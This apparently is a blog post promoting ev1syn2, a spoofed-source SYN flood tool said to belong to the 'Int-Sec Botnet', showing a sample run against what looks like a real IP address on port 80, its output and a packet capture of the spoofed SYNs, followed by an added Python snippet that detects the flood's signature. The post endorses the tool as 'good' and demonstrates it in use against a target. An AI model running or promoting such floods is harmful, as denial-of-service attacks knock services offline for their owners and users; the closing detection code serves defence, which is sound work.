ev1syn2.c is a part of the Int-Sec Botnet from my friend ev1lut10n.
Here is the source: ev1syn2.c
Sample usage:
# ./ev1syn2 77.78.103.36 80 80 2 2
[+] Delay Range Set to 2 second(s) and fork number set to 2 fork[s]
[+] New PID Set
[+] New PID Set
[+] New PID Set
[+] New PID Set
[+] Creating raw socket to attack 77.78.103.36 on port 80
[+] IP header set
[+] TCP header set
[+] Injected ip datagram
[+] Socket option set
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [83.85.162.151:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [121.249.252.241:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [233.19.20.82:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [31.142.81.45:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [167.39.87.8:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [130.82.208.212:80]
[+] SYN sent to [77.78.103.36:80] using spoofed ip: [74.153.27.117:80]
and the capture is correct now:
=========
No. Time Source Destination Protocol Info
18 10.831261 83.85.162.151 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 18 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 83.85.162.151 (83.85.162.151), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 0]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
19 11.831563 121.249.252.241 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 19 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 121.249.252.241 (121.249.252.241), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 1]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
20 11.831670 233.19.20.82 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 20 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 233.19.20.82 (233.19.20.82), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 2]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
21 11.831767 31.142.81.45 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 21 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 31.142.81.45 (31.142.81.45), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 3]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
22 11.859795 10.162.160.1 255.255.255.255 DHCP DHCP Offer - Transaction ID 0x5e8f01e6
Frame 22 (329 bytes on wire, 329 bytes captured)
Ethernet II, Src: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9), Dst: Broadcast (ff:ff:ff:ff:ff:ff)
Internet Protocol, Src: 10.162.160.1 (10.162.160.1), Dst: 255.255.255.255 (255.255.255.255)
User Datagram Protocol, Src Port: bootps (67), Dst Port: bootpc (68)
Bootstrap Protocol
No. Time Source Destination Protocol Info
23 12.832008 167.39.87.8 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 23 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 167.39.87.8 (167.39.87.8), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 4]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
No. Time Source Destination Protocol Info
24 12.832110 130.82.208.212 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
Frame 24 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: Dell_56:0b:10 (00:1c:23:56:0b:10), Dst: c4:71:fe:76:f4:d9 (c4:71:fe:76:f4:d9)
Internet Protocol, Src: 130.82.208.212 (130.82.208.212), Dst: 77.78.103.36 (77.78.103.36)
Transmission Control Protocol, Src Port: http (80), Dst Port: http (80), Seq: 0, Len: 0
Source port: http (80)
Destination port: http (80)
[Stream index: 5]
Sequence number: 0 (relative sequence number)
Header length: 20 bytes
Flags: 0x02 (SYN)
Window size: 0
Checksum: 0x0000 [validation disabled]
Thanks to ev1 for this good tool
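From the defender's side, the capture above carries a recognisable signature: SYNs with a zero window, source port equal to destination port, and source addresses drawn at random (one of them, 233.19.20.82, is multicast and can never be a legitimate source). The following is an added example, not code from the original post or from the tool's author; it parses the capture's summary lines and flags that pattern per destination. The flag names and the `min_sources` threshold are assumptions chosen for illustration.

```python
import ipaddress
import re
from collections import defaultdict

# Summary lines copied from the capture above (frames 18-24).
CAPTURE = """\
18 10.831261 83.85.162.151 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
19 11.831563 121.249.252.241 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
20 11.831670 233.19.20.82 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
21 11.831767 31.142.81.45 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
22 11.859795 10.162.160.1 255.255.255.255 DHCP DHCP Offer - Transaction ID 0x5e8f01e6
23 12.832008 167.39.87.8 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
24 12.832110 130.82.208.212 77.78.103.36 TCP http > http [SYN] Seq=0 Win=0 Len=0
"""

SYN_RE = re.compile(
    r"^(?P<no>\d+) (?P<time>[\d.]+) (?P<src>\S+) (?P<dst>\S+) TCP "
    r"(?P<sport>\S+) > (?P<dport>\S+) \[SYN\] Seq=\d+ Win=(?P<win>\d+) Len=\d+")

def packet_flags(m):
    """Return the anomaly names (assumed labels) that apply to one SYN line."""
    flags = []
    # Seq=0 is ignored: Wireshark shows relative sequence numbers by default.
    if int(m["win"]) == 0:            # real stacks advertise a non-zero window
        flags.append("zero_window")
    if m["sport"] == m["dport"]:      # clients normally use an ephemeral port
        flags.append("sport_eq_dport")
    src = ipaddress.ip_address(m["src"])
    if src.is_multicast or src.is_reserved or src.is_unspecified:
        flags.append("bogon_source")  # address that cannot originate traffic
    return flags

def detect(capture, min_sources=5):
    """Report destinations hit by anomalous SYNs from >= min_sources sources."""
    per_dst = defaultdict(lambda: {"sources": set(), "flags": set(), "frames": 0})
    for line in capture.splitlines():
        m = SYN_RE.match(line.strip())
        if not m:
            continue                  # not a TCP SYN (e.g. the DHCP offer)
        flags = packet_flags(m)
        if not flags:
            continue
        entry = per_dst[m["dst"]]
        entry["sources"].add(m["src"])
        entry["flags"].update(flags)
        entry["frames"] += 1
    return {dst: {"frames": e["frames"], "sources": len(e["sources"]),
                  "flags": sorted(e["flags"])}
            for dst, e in per_dst.items() if len(e["sources"]) >= min_sources}
```

On a live link the same three checks translate directly into a capture filter or IDS rule; the bogon-source check alone is also what ingress filtering at the network edge would drop.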